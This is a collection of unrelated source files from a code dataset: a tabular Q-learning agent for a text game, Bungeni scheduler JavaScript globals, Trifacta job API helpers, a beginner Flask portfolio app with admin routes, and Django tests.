qValue > best_action_value :\r\n            best_action = (i, j)\r\n            best_action_value = qValue\r\n\r\n    if best_action is not None and choice == 1 : # choose the best one\r\n        (action_index, object_index) = best_action\r\n    else: # random choose from valid actions\r\n        choice = np.random.choice(len(random_actions))\r\n        (action_index, object_index) = random_actions[choice]\r\n\r\n    #\r\n    # valid_actions = []\r\n    # best_action = (None, None)\r\n    # for i in range(NUM_ACTIONS):\r\n    #     for j in range(NUM_OBJECTS):\r\n    #         if (framework.command_is_valid[current_room_index, i, j] == 1):\r\n    #             valid_actions.append((i,j))\r\n    #             qValue = q_func[state_1, state_2, i, j]\r\n    #             if qValue > best_action_value :\r\n    #                 best_action = (i, j)\r\n    #                 best_action_value = qValue\r\n    # if best_action_value > 0 and choice == 1 : # choose the best one\r\n    #     (action_index, 
object_index) = best_action\r\n    # else: # random choose from valid actions\r\n    #     choice = np.random.choice(len(valid_actions))\r\n    #     (action_index, object_index) = valid_actions[choice]\r\n\r\n    return (action_index, object_index)\r\n\r\n\r\ndef state_value(q_func, state_1, state_2):\r\n    \"\"\"\r\n    V(s) = max Q(s,c) for all c, where c represents an action of a on object b: (a, b)\r\n    \"\"\"\r\n    q_v = q_func[state_1, state_2, ...]\r\n    return np.amax(q_v)\r\n\r\n\r\ndef tabular_q_learning(q_func, current_state_1, current_state_2, action_index,\r\n                       object_index, reward, next_state_1, next_state_2,\r\n                       terminal):\r\n    \"\"\"Update q_func for a given transition\r\n\r\n    Qnew(s,c) = (1-alpha) * Qold(s,c) + alpha * (Reward(s,c,s') + gamma * V(s'))\r\n    V(s) = max Q(s,c) for all c, where c represents an action of a on object b: (a, b)\r\n\r\n    Args:\r\n        q_func (np.ndarray): current Q-function\r\n        current_state_1, current_state_2 (int, int): two indices describing the current state\r\n        action_index (int): index of the current action\r\n        object_index (int): index of the current object\r\n        reward (float): the immediate reward the agent receives from playing the current command\r\n        next_state_1, next_state_2 (int, int): two indices describing the next state\r\n        terminal (bool): True if this episode is over\r\n\r\n    Returns:\r\n        None\r\n    \"\"\"\r\n    # per the formula above, the bootstrap term uses the value of the NEXT state,\r\n    # V(s'), which is zero once the episode has terminated\r\n    if terminal:\r\n        next_state_value = 0\r\n    else:\r\n        next_state_value = state_value(q_func, next_state_1, next_state_2)\r\n\r\n    currentQ = q_func[current_state_1, current_state_2, action_index,\r\n                      object_index]\r\n\r\n    q_func[current_state_1, current_state_2, action_index,\r\n           object_index] = (1 - ALPHA) * currentQ + ALPHA * (reward + GAMMA * next_state_value)\r\n\r\n    return None # This function shouldn't return anything\r\n\r\n\r\n
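# A tiny worked example of the update above (illustrative numbers only, added\r\n# for clarity): with ALPHA=0.1, GAMMA=0.5, Q(s,c)=1.0, reward=2.0 and V(s')=4.0,\r\n# the new value is (1-0.1)*1.0 + 0.1*(2.0 + 0.5*4.0) = 1.3.\r\n\r\n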
# In this section, you will evaluate your learning algorithm for the Home World game.\r\n# The metric we use to measure an agent's performance is the cumulative discounted reward obtained per episode averaged over the episodes.\r\n# The evaluation procedure is as follows. Each experiment (or run) consists of multiple epochs (the number of epochs is NUM_EPOCHS).\r\n# In each epoch:\r\n# 1. You first train the agent on NUM_EPIS_TRAIN episodes, following an 𝜀-greedy policy with 𝜀=TRAINING_EP and updating the 𝑄 values.\r\n# 2. Then, you have a testing phase of running NUM_EPIS_TEST episodes of the game, following an 𝜀-greedy policy with 𝜀=TESTING_EP,\r\n#    which makes the agent choose the best action according to its current Q-values 95% of the time.\r\n# At the testing phase of each epoch, you will compute the cumulative discounted reward for each episode and then obtain the average reward over the NUM_EPIS_TEST episodes.\r\n# Finally, at the end of the experiment, you will get a sequence of data (of size NUM_EPOCHS) that represents the testing performance at each epoch.\r\n#\r\n# Note that there is randomness in both the training and testing phase. You will run the experiment NUM_RUNS times and then compute the averaged reward performance over NUM_RUNS experiments.\r\n#\r\n\r\ndef run_episode(for_training):\r\n    \"\"\" Runs one episode\r\n    If for training, update Q function\r\n    If for testing, computes and returns the cumulative discounted reward\r\n\r\n    Args:\r\n        for_training (bool): True if for training\r\n\r\n    Returns:\r\n        None if for_training, else the episode's cumulative discounted reward\r\n    \"\"\"\r\n    epsilon = TRAINING_EP if for_training else TESTING_EP\r\n\r\n    # initialize for each episode\r\n    epi_reward = 0.0\r\n    gamma_step = 1.0 # running discount factor GAMMA**t for the current time step\r\n\r\n    (current_room_desc, current_quest_desc, terminal) = framework.newGame()\r\n    while not terminal:\r\n        # Choose next action and execute\r\n\r\n        current_room_index = framework.rooms_desc_map[current_room_desc]\r\n        quest_index = framework.quests_map[current_quest_desc]\r\n\r\n        (action, object) = epsilon_greedy(current_room_index, quest_index, q_func, epsilon)\r\n        (next_room_desc, next_quest_desc, reward, terminal) = framework.step_game(current_room_desc, current_quest_desc, action, object)\r\n\r\n        if for_training:\r\n            # update Q-function.\r\n            next_room_index = framework.rooms_desc_map[next_room_desc]\r\n            next_quest_index = framework.quests_map[next_quest_desc]\r\n            tabular_q_learning(q_func, current_room_index, quest_index, action, object, reward, next_room_index, next_quest_index, terminal)\r\n\r\n\r\n        if not for_training:\r\n            # accumulate the cumulative DISCOUNTED reward, as the evaluation metric requires\r\n            epi_reward += gamma_step * reward\r\n            gamma_step *= GAMMA\r\n\r\n        # prepare next step\r\n        current_room_desc = next_room_desc\r\n        current_quest_desc = next_quest_desc\r\n\r\n    if not for_training:\r\n        return epi_reward\r\n\r\n\r\n# pragma: coderesponse end\r\n\r\n\r\ndef run_epoch():\r\n    \"\"\"Runs one epoch and returns reward averaged over test episodes\"\"\"\r\n    rewards = []\r\n\r\n    for _ in range(NUM_EPIS_TRAIN):\r\n        run_episode(for_training=True)\r\n\r\n    for _ in range(NUM_EPIS_TEST):\r\n        rewards.append(run_episode(for_training=False))\r\n\r\n    return np.mean(np.array(rewards))\r\n\r\n\r\ndef run():\r\n    \"\"\"Returns array of test reward per epoch for one run\"\"\"\r\n    global q_func\r\n    q_func = np.zeros((NUM_ROOM_DESC, NUM_QUESTS, NUM_ACTIONS, NUM_OBJECTS))\r\n\r\n    single_run_epoch_rewards_test = []\r\n    pbar = tqdm(range(NUM_EPOCHS), ncols=80)\r\n    for _ in pbar:\r\n        single_run_epoch_rewards_test.append(run_epoch())\r\n        pbar.set_description(\r\n            \"Avg reward: {:0.6f} | Ewma reward: {:0.6f}\".format(\r\n                np.mean(single_run_epoch_rewards_test),\r\n                utils.ewma(single_run_epoch_rewards_test)))\r\n    return single_run_epoch_rewards_test\r\n\r\n\r\nif __name__ == '__main__':\r\n    # Data loading and build the dictionaries that use unique index for each state\r\n    (dict_room_desc, dict_quest_desc) = framework.make_all_states_index()\r\n    NUM_ROOM_DESC = len(dict_room_desc)\r\n    NUM_QUESTS = len(dict_quest_desc)\r\n\r\n    # set up the game\r\n    framework.load_game_data()\r\n\r\n    epoch_rewards_test = [] # shape NUM_RUNS * NUM_EPOCHS\r\n\r\n    for _ in range(NUM_RUNS):\r\n        epoch_rewards_test.append(run())\r\n\r\n    epoch_rewards_test = np.array(epoch_rewards_test)\r\n\r\n    x = np.arange(NUM_EPOCHS)\r\n    fig, axis = plt.subplots()\r\n    axis.plot(x, np.mean(epoch_rewards_test,\r\n                         axis=0)) # plot reward per epoch averaged per run\r\n    axis.set_xlabel('Epochs')\r\n    axis.set_ylabel('reward')\r\n    axis.set_title(('Tabular: nRuns=%d, Epsilon=%.2f, Epi=%d, alpha=%.4f' %\r\n                    (NUM_RUNS, TRAINING_EP, NUM_EPIS_TRAIN, ALPHA)))\r\n    
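# added for convenience (not part of the original scaffold): persist the\r\n    # run-averaged learning curve so separate experiments can be compared later\r\n    np.save('tabular_ql_epoch_rewards.npy', np.mean(epoch_rewards_test, axis=0))\r\n    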
plt.show()\r\n","sub_path":"reinforcement_learning/agent_tabular_ql.py","file_name":"agent_tabular_ql.py","file_ext":"py","file_size_in_byte":12402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2690476","text":"# Bungeni Parliamentary Information System - http://www.bungeni.org/\n# Copyright (C) 2010 - Africa i-Parliaments - http://www.parliaments.info/\n# Licensed under GNU GPL v2 - http://www.gnu.org/licenses/gpl-2.0.txt\n\n\"\"\"Python code for JavaScript resources.\n\n$Id$\n\"\"\"\nimport json\nimport zope.interface\nfrom zope.app.component.hooks import getSite\nimport zope.publisher.interfaces.browser\nfrom bungeni.ui.utils import url\nfrom bungeni.utils import common, misc\nfrom bungeni.core.language import get_default_language\nfrom bungeni.ui.calendar import data\nfrom bungeni.capi import capi\nfrom bungeni import _, translate\n\n\nclass CachedProperties(object):\n \n @misc.cached_property\n def items_container(self):\n \"\"\"The URL to a container listing documents available for scheduling\n \"\"\"\n site = getSite()\n container = site[\"workspace\"][\"scheduling\"][\"documents\"]\n request = common.get_request()\n app_url = request.getApplicationURL()\n return url.absoluteURL(container, request).replace(app_url, \"\")\n\ncached_props = CachedProperties()\n\nRESOURCE_MAPPING = {\n \"scheduler-globals.js\": \"scheduler_globals\",\n \"calendar-globals.js\": \"calendar_globals\",\n}\n\nRESOURCE_HEADERS = {}\n\n## some global strings to i18n ##\nYES = _(\"scheduling_message_yes\", default=u\"Yes\")\nNO = _(\"scheduling_message_no\", default=u\"No\")\nOKAY = _(\"scheduling_message_okay\", default=u\"Okay\")\nDONE = _(\"scheduling_message_done\", default=u\"Done\")\nNOTICE = _(\"scheduling_message_notice\", default=u\"Notice\")\nWORKING = _(\"scheduling_message_working\", default=u\"Working\")\nCANCEL = _(\"scheduling_message_cancel\", default=u\"Cancel\")\nVIEW = _(\"scheduling_message_view\", default=u\"View\")\nEDIT = _(\"scheduling_message_edit\", default=u\"Edit\")\nDELETE = _(\"scheduling_message_delete\", default=u\"Delete\")\nWARNING = _(\"scheduling_message_warning\", default=u\"Warning\")\nMINUTES = _(\"scheduling_text_minutes\", default=u\"Minutes\")\nSTART_DATE = _(\"scheduling_filters_start_date\", default=u\"Start Date\")\nEND_DATE = _(\"scheduling_filters_end_date\", default=u\"End Date\")\n\n# columns\nCOLUMN_TYPE = _(\"scheduling_column_type\", default=\"Type\")\nCOLUMN_MOVER = _(\"scheduling_column_mover\", default=\"Moved by\")\nCOLUMN_STATUS = _(\"scheduling_column_status\", default=\"Status\")\nCOLUMN_STATUS_DATE = _(\"scheduling_column_status_date\", default=\"Date\")\nCOLUMN_REGISTRY_NUMBER = _(\"scheduling_column_registry_no\", default=\"No.\")\nCOLUMN_DESCRIPTION = _(\"scheduling_column_description\", \n default=\"Description\")\nCOLUMN_MINUTE_TEXT = _(\"scheduling_column_minute_text\", \n default=\"Minute Text\")\n\n# titles\nTITLE_AGENDA = _(\"scheduling_title_agenda\", default=\"Agenda\")\nTITLE_AGENDA_MINUTES = _(\"scheduling_title_agenda_minutes\", \n default=\"Agenda Minutes and Votes\")\nTITLE_SCHEDULED_ITEMS = _(\"scheduling_title_scheduled_items\", \n default=\"Scheduled Items\")\nTITLE_AVAILABLE_ITEMS = _(\"scheduling_title_available_items\", \n default=\"Available Items\")\nTITLE_DISCUSSIONS = _(\"scheduling_title_discussions\", \n default=\"Agenda and Minutes\")\n\n# types\nTYPE_HEADING = _(\"scheduling_type_heading\", default=\"Heading\")\nTYPE_MINUTE = _(\"scheduling_type_minute\", 
default=\"Minute Record\")\nTYPE_EDITORIAL_NOTE = _(\"scheduling_type_editorial_note\", \n default=\"Editorial Note\")\n\n# actions\nREMOVE_ITEM = _(\"scheduling_action_remove_item\", default=\"Remove Item\")\nADD_MINUTE = _(\"scheduling_action_add_minute\", default=\"Add Minute\")\nSAVE_AND_PREVIEW = _(\"scheduling_action_save_preview\", \n default=\"Save and preview\")\nSAVE_CHANGES = _(\"scheduling_action_save_changes\", \n default=\"Save Changes\")\nDISCARD_CHANGES = _(\"scheduling_action_discard_changes\", \n default=\"Discard Changes\")\n\n\ndef get_globals(group_name, target_language=None):\n kwargs = {\"target_language\": target_language or capi.default_language}\n type_names = {\n \"heading\": translate(_(u\"heading\"), **kwargs),\n \"editorial_note\": translate(TYPE_EDITORIAL_NOTE, **kwargs),\n \"minute\": translate(_(u\"minute record\"), **kwargs),\n }\n type_names.update([\n (name, translate(info.get(\"display_name\"), **kwargs))\n for (name, info) in data.get_schedulable_types(True).iteritems()\n ])\n globals_map = {\n \"SCHEDULER_GLOBALS\" : {\n \"items_container_uri\": cached_props.items_container,\n \"schedulable_types\": [ \n dict(name=name, title=translate(info.get(\"title\"), **kwargs)) \n for (name, info) in \n sorted(data.get_schedulable_types().iteritems())\n ],\n \"discussable_types\": [k for k in data.get_schedulable_types(True)],\n \"editable_types\": [\"editorial_note\", \"heading\", \"minute\"],\n \"types\": {\n \"HEADING\": \"heading\",\n \"EDITORIAL_NOTE\": \"editorial_note\",\n \"MINUTE\": \"minute\",\n },\n \"type_names\": type_names,\n \"current_schedule_title\": translate(TITLE_AGENDA, **kwargs),\n \"agenda_minutes_title\": translate(TITLE_AGENDA_MINUTES, **kwargs),\n \"current_schedule_items\": translate(TITLE_SCHEDULED_ITEMS, **kwargs),\n \"available_items_title\": translate(TITLE_AVAILABLE_ITEMS, **kwargs),\n \"schedule_discussions_title\": translate(TITLE_DISCUSSIONS, **kwargs),\n \"scheduled_item_context_menu_header\": translate(_(u\"Modify Item\"), \n **kwargs\n ),\n \"json_listing_url\" : \"./items/jsonlisting-schedule?include_text_records=y\",\n \"json_listing_url_meta\" : \"./items/jsonlisting-schedule?add_wf=y&include_text_records=y\",\n \"save_schedule_url\": \"./items/save-schedule\",\n \"discussions_save_url\": \"discussions/save-discussions\",\n \"discussion_items_json_url\" : \"discussions/jsonlisting-raw\",\n \"schedulable_items_json_url\" : \"./schedulable-items-json\",\n \"column_title\": translate(COLUMN_DESCRIPTION, **kwargs),\n \"column_discussion_text\": translate(COLUMN_MINUTE_TEXT, **kwargs),\n \"column_discussion_text_missing\": translate(_(u\"NO TEXT RECORD FOUND\"), **kwargs),\n \"column_discussion_edit_button\": translate(EDIT, **kwargs),\n \"column_discussions_edit_button\": translate(MINUTES, **kwargs),\n \"column_discussion_delete_button\": translate(DELETE, **kwargs),\n \"column_available_headings_title\": translate(_(u\"Select existing heading\"), **kwargs),\n \"column_type\": translate(COLUMN_TYPE, **kwargs),\n \"column_mover\": translate(COLUMN_MOVER, **kwargs),\n \"column_status\": translate(COLUMN_STATUS, **kwargs),\n \"column_status_date\": translate(COLUMN_STATUS_DATE, **kwargs),\n \"column_registry_number\": translate(COLUMN_REGISTRY_NUMBER, **kwargs),\n \"empty_agenda_message\": translate(_(u\"the agenda is empty. 
add items \"\n \"from below from from the available documents to the right\"),\n **kwargs),\n \"text_button_text\": translate(TYPE_EDITORIAL_NOTE, **kwargs),\n \"text_records_title\": translate(_(u\"add text records\"), **kwargs),\n \"heading_button_text\": translate(TYPE_HEADING, **kwargs),\n \"minute_button_text\": translate(TYPE_MINUTE, **kwargs),\n \"new_heading_text\": translate(_(u\"custom heading\"), **kwargs),\n \"text_action_view\": translate(VIEW, **kwargs),\n \"text_moved_by\": translate(COLUMN_MOVER, **kwargs),\n \"remove_button_text\": translate(REMOVE_ITEM, **kwargs),\n \"save_button_text\": translate(SAVE_CHANGES, **kwargs),\n \"save_and_preview_button_text\": translate(SAVE_AND_PREVIEW, **kwargs),\n \"discard_button_text\": translate(DISCARD_CHANGES, **kwargs),\n \"add_discussion_button_text\": translate(ADD_MINUTE, **kwargs),\n \"save_discussion_button_text\": translate(ADD_MINUTE, **kwargs),\n \"initial_editor_text\": translate(_(u\"change this text\"), **kwargs),\n \"delete_dialog_header\": translate(_(u\"Remove item from schedule\")),\n \"delete_dialog_text\": translate(\n _(u\"Are you sure you want to remove this item from schedule ?\"),\n **kwargs),\n \"delete_dialog_confirm\": translate(YES, **kwargs),\n \"delete_dialog_cancel\": translate(NO, **kwargs),\n \"save_dialog_header\": translate(NOTICE, **kwargs),\n \"save_dialog_empty_message\": translate(\n _(u\"No items have been scheduled. Add something then save.\"), \n **kwargs),\n \"save_dialog_confirm\": translate(OKAY, **kwargs),\n \"saving_dialog_header\": translate(WORKING, **kwargs),\n \"saving_schedule_text\": translate(_(u\"saving changes to schedule...\"), **kwargs),\n \"saving_discussions_text\": translate(_(u\"saving changes to minutes...\"), **kwargs),\n \"saving_dialog_refreshing\": translate(_(u\"reloading schedule...\"), **kwargs),\n \"saving_dialog_exception\": translate(\n _(u\"there was an error while saving the schedule\"), **kwargs),\n \"filters_no_filters_header\": translate(_(u\"no filters selected\"), **kwargs),\n \"filters_no_filters_message\": translate(\n _(u\"you did not choose any filters.\" \"select some filters then hit apply\"), \n **kwargs),\n \"filters_start_date_label\": translate(START_DATE, **kwargs),\n \"filters_end_date_label\": translate(END_DATE, **kwargs),\n \"filters_clear_label\": translate(_(u\"clear filters\"), **kwargs),\n \"filter_config\": data.get_filter_config(),\n \"filter_apply_label\": translate(_(u\"apply filters\"), **kwargs),\n \"message_no_add_rights\": translate(_(u\"this schedule is read only\"), **kwargs),\n \"text_warning\": translate(WARNING, **kwargs),\n \"text_items_dialog_header\": translate(_(u\"add text to schedule\"), **kwargs),\n \"text_dialog_confirm_action\": translate(OKAY, **kwargs),\n \"text_dialog_done_action\": translate(DONE, **kwargs),\n \"text_dialog_cancel_action\": translate(CANCEL, **kwargs),\n \"text_unsaved_changes\": translate(_(u\"Schedule has unsaved changes\"), **kwargs),\n \"text_unsaved_discussions\": translate(_(u\"Do you want to delete unsaved minute?\"), **kwargs),\n \"confirm_dialog_title\": translate(_(u\"Confirmation Required\"), **kwargs),\n \"confirm_message_delete_discussion\": translate(\n _(u\"Really remove this minute record?\"), **kwargs),\n \"message_item_not_saved\": translate(_(u\"You need to save the schedule before \"\n \"adding minutes for it to this item.\"), **kwargs),\n \"minutes_header\": translate(MINUTES, **kwargs),\n \"minutes_unsaved_agenda\": translate(_(u\"*Unsaved item. 
No minute records.\"), **kwargs),\n \"minutes_no_records\": translate(_(u\"No minute records\"), **kwargs),\n \"add_minutes_record\": translate(_(u\"add minutes record\"), **kwargs),\n \"minutes_edit\": translate(_(u\"Edit\"), **kwargs),\n \"minutes_loading\": translate(_(u\"Loading minutes...\"), **kwargs),\n \"minutes_loading_error\": translate(_(u\"unable to load minutes...\"), **kwargs),\n \"preview_msg_header\": translate(_(u\"agenda preview\"), **kwargs),\n \"preview_msg_generating\": translate(_(u\"generating agenda preview...\"), **kwargs),\n \"preview_msg_error\": translate(_(u\"ERROR: Could to generate preview\"), **kwargs),\n },\n \"CALENDAR_GLOBALS\": {\n \"unsaved_event\": translate(_(u\"This event is unsaved. \" \n \"Edit to make any corrections and then save it\"), **kwargs),\n \"errors_scheduler\": translate(_(u\"Please make corrections. \"\n \"The highlighted fields are required.\"), **kwargs),\n \"error_collission\": translate(_(u\"This timeslot already has another \" \n u\"event.\\n Do you want still want to add it?\"), **kwargs\n ),\n \"message_okay\": translate(OKAY, **kwargs),\n },\n }\n return globals_map.get(group_name, {})\n\nclass DynamicDirectoryFactory(object):\n \"\"\"Allows generation of static resources whose content is contextual.\n \n For example, we want some system parameters to be available to certain\n registered JavaScript resources\n \"\"\"\n \n zope.interface.implements(\n zope.publisher.interfaces.browser.IBrowserPublisher\n )\n\n def __init__(self, source, checker, name):\n self.name = name\n self.__Security_checker__ = checker\n self.language = None\n \n def __call__(self, name):\n return self\n \n def __getitem__(self, name):\n return lambda:\"/@@/%s/%s\" % (self.name, name)\n \n def publishTraverse(self, request, name):\n request.response.setHeader(\"Content-type\", \n RESOURCE_HEADERS.get(name, \"text/javascript\")\n )\n self.request = request\n self.language = get_default_language()\n return getattr(self, RESOURCE_MAPPING.get(name))\n \n def scheduler_globals(self):\n return \"\"\"var scheduler_globals = %s;\"\"\" % json.dumps(\n get_globals(\"SCHEDULER_GLOBALS\", target_language=self.language)\n )\n \n def calendar_globals(self):\n return \"\"\"var calendar_globals = %s;\"\"\" % json.dumps(\n get_globals(\"CALENDAR_GLOBALS\", target_language=self.language)\n )\n\n","sub_path":"bungeni.main/trunk/bungeni/ui/resources/dynamic.py","file_name":"dynamic.py","file_ext":"py","file_size_in_byte":13449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"241354012","text":"from trifacta.util.tfrequests import TrifactaEndpoint\n\n\ndef mk_run_job_group_request(w_ds_id):\n req = {\n \"wrangledDataset\": {\n \"id\": w_ds_id\n }\n }\n return TrifactaEndpoint('POST', '/v4/jobGroups', req)\n\n\ndef mk_get_job_status_request(job_id):\n return TrifactaEndpoint('GET', f'/v4/jobs/{job_id}/status')\n","sub_path":"trifacta-dbt/objects/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"653999593","text":"from flask import Flask,redirect,url_for,render_template,request\nimport random\nimport os,datetime\nfrom flask_sqlalchemy import SQLAlchemy\napp=Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'\ndb = SQLAlchemy(app)\n\nclass Xeber(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_img = db.Column(db.String(80))\n n_ad = db.Column(db.String(120))\n 
n_paragraf = db.Column(db.String(120))\n n_date = db.Column(db.String(120))\n \nclass Task(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_date = db.Column(db.String(120))\n n_ixtisas = db.Column(db.String(80))\n n_universtet = db.Column(db.String(120))\n n_haqqinda = db.Column(db.String(120))\n\nclass Emr(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_img = db.Column(db.String(80))\n n_date = db.Column(db.String(120))\n\nclass Test(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_img = db.Column(db.String(80))\n n_ad = db.Column(db.String(120))\n n_adress = db.Column(db.String(120))\n n_paragraf = db.Column(db.String(120))\n n_date = db.Column(db.String(120))\n \n# db.create_all()\n# class Images:\n# def __init__(self,_id,_src):\n# self.id=_id\n# self.src=_src\n# images=[\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-1.jpg'\n \n \n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-5.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-3.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-1.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-5.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-3.jpg'\n# ),\n# ]\n\n# class Boxs:\n# def __init__(self,_id,_year,_skill,_universty,_detail):\n# self.id=_id\n# self.year=_year\n# self.skill=_skill\n# self.universty=_universty\n# self.detail=_detail\n \n# boxs=[\n# Boxs(\n# random.randint(1,1000),\n# '2015-2019',\n# 'Computer Engineer',\n# 'Techinal universty',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# Boxs(\n# random.randint(1,1000),\n# '2021-2022',\n# 'Web-devoloper',\n# 'Pragmatech',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n \n# ] \n# class News:\n# def __init__(self,_id,_icon,_title,_detail):\n# self.id=_id\n# self.icon=_icon\n# self.title=_title\n# self.detail=_detail\n \n# news=[\n# News(\n# random.randint(1,1000),\n# 'fab fa-html5',\n# 'HTML',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# News(\n# random.randint(1,1000),\n# 'fab fa-css3-alt',\n# 'CSS',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# News(\n# random.randint(1,1000),\n# 'fab fa-bootstrap',\n# 'Bootstrap',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# News(\n# random.randint(1,1000),\n# 'fab fa-js-square',\n# 'Javascript',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# ]\n# class Comments:\n# def __init__(self,_id,_img,_name,_adress,_paragraf,_icon):\n# self.id=_id\n# self.img=_img\n# self.name=_name\n# self.adress=_adress\n# self.paragraf=_paragraf\n# self.icon=_icon\n \n# comments=[\n# Comments(\n# random.randint(1,1000),\n# '../static/image/nurlan1.jpg ',\n# 'Dennis Jacques',\n# 'User from Baku',\n# 'Lorem ipsum dolor sit amet consectetur adipisicing elit. 
Magnam, reprehenderit!',\n#             'fas fa-star '\n#         )\n    \n    \n    \n# ]\n\n    \n# @app.route('/',methods=['GET','POST'])\n# def hosts(): \n#     return render_template('index.html',allnews=news,allboxs=boxs,allimages=images,allcomments=comments)\n    \n# app route for the contact section\n@app.route('/',methods=['GET','POST'])\ndef add():\n    butunxeberler=Xeber.query.all()\n    butuntasklar=Task.query.all()\n    butunemrler=Emr.query.all()\n    butuntestler=Test.query.all()\n    \n    \n    return render_template('index.html',xeberler=butunxeberler,tasklar=butuntasklar,emrler=butunemrler,testler=butuntestler)\n\nistifadeciler=[]\n@app.route('/users',methods=['GET','POST'])\n\ndef users(): \n    if request.method=='POST':\n        _ad=request.form['ad']\n        _soyad=request.form['soyad']\n        _textarea=request.form['textarea']\n\n        istifadeci={\n            'ad':_ad,\n            'soyad':_soyad, \n            'textarea':_textarea\n        }\n        istifadeciler.append(istifadeci)\n        return render_template('admin.html',users=istifadeciler)\n    return render_template('admin.html')\n# app route for the \"what I do\" section\n# (note: '/' is registered several times in this file; Flask dispatches '/' to the\n# first matching rule, so the later '/' handlers below are effectively unreachable)\n@app.route('/',methods=['GET','POST'])\ndef app_index():\n    butunxeberler=Xeber.query.all()\n    \n    return render_template('index.html',xeberler=butunxeberler) \nxeberler=[]\n@app.route('/admin',methods=['GET','POST'])\ndef admin_index():\n    butunxeberler=Xeber.query.all() \n    if request.method=='POST':\n        file=request.files['sekil']\n        seklinadi=file.filename\n        file.save(os.path.join('static/uploads/',seklinadi))\n        _ad=request.form['ad']\n        _paragraf=request.form['paragraf']\n        _seklinadi=seklinadi\n        _tarix=datetime.date.today()\n        xeber=Xeber(\n            n_img=_seklinadi,\n            n_ad=_ad,\n            n_paragraf=_paragraf,\n            n_date=_tarix\n        )\n        db.session.add(xeber)\n        db.session.commit()\n        return redirect('/admin')\n    \n    \n    return render_template('admin.html',xeberler=butunxeberler) \n\n@app.route('/admin/delete/<id>',methods=['GET','POST'])\n\ndef admin_delete(id):\n    silinecekolanXeber=Xeber.query.get(id)\n    db.session.delete(silinecekolanXeber)\n    db.session.commit()\n    return redirect('/admin')\n# app route for the resume section\n@app.route('/',methods=['GET','POST'])\ndef app_indexx():\n    butuntasklar=Task.query.all() \n    return render_template('index.html',tasklar=butuntasklar) \nTasklar=[]\n@app.route('/nurlan',methods=['GET','POST'])\ndef admin_indexx():\n    \n    butuntasklar=Task.query.all() \n    if request.method=='POST':\n        _tarix=request.form['date']\n        _ixtisas=request.form['ixtisas']\n        _universtet=request.form['universtet']\n        _haqqinda=request.form['haqqinda']\n        \n        \n        \n        task=Task(\n            n_date=_tarix,\n            n_ixtisas=_ixtisas,\n            n_universtet=_universtet,\n            n_haqqinda=_haqqinda\n            \n        )\n        db.session.add(task)\n        db.session.commit()\n        return redirect('/nurlan')\n    \n    \n    return 
render_template('admin.html',emrler=butunemrler) \n\n@app.route('/cahan/delete/',methods=['GET','POST'])\n\ndef cahan_delete(id):\n silinecekolanEmr=Emr.query.get(id)\n db.session.delete(silinecekolanEmr)\n db.session.commit()\n return redirect('/cahan')\n# tesmonial routu\n@app.route('/',methods=['GET','POST'])\ndef app_indexxxx():\n butuntestler=Test.query.all()\n \n return render_template('index.html',testler=butuntestler) \ntestler=[]\n@app.route('/girov',methods=['GET','POST'])\ndef admin_indexxxx():\n butuntestler=Test.query.all() \n if request.method=='POST':\n file=request.files[\"img\"]\n seklinadi=file.filename\n file.save(os.path.join('static/uploads/',seklinadi))\n _ad=request.form['ad']\n _adress=request.form['adress']\n _paragraf=request.form['paragraf']\n _seklinadi=seklinadi\n _tarix=datetime.date.today()\n \n test=Test(\n n_img=_seklinadi,\n n_ad=_ad,\n n_adress=_adress,\n n_paragraf=_paragraf,\n n_date=_tarix\n )\n db.session.add(test)\n db.session.commit()\n return redirect('/girov')\n \n \n return render_template('admin.html',testler=butuntestler) \n\n@app.route('/girov/delete/',methods=['GET','POST'])\n\ndef girov_delete(id):\n silinecekolanTest=Test.query.get(id)\n db.session.delete(silinecekolanTest)\n db.session.commit()\n return redirect('/girov') \n\nif __name__ == \"__main__\":\n app.run(port=5000,debug=True)\n","sub_path":"ProjectFrontend/My portfolio/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323428950","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom dokumentor.models import Project\n\nclass ProjectTests(TestCase):\n\n def test_was_published_recently_with_future_question(self):\n Project.objects.create(name=\"SomeThing\", duration=0)\n project = Project.objects.get(name=\"SomeThing\")\n self.assertEqual(project.name, \"SomeThing\")\n\n def test_form_to_create_project(self):\n response = self.client.post(reverse('projects:name_step'), {'name': \"A Project name\", 'description': 'a beautiful project I started...'})\n\n projects = Project.objects.order_by('name')\n project = Project.objects.get(name=\"A Project name\")\n self.assertEqual(\"A Project name\", project.name)\n self.assertContains(response, '', status_code=302)\n\n","sub_path":"dokumentor/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181291864","text":"import tensorflow as tf\n\nprint('Using Tensorflow ' + tf.__version__)\nimport matplotlib.pyplot as plt\nimport 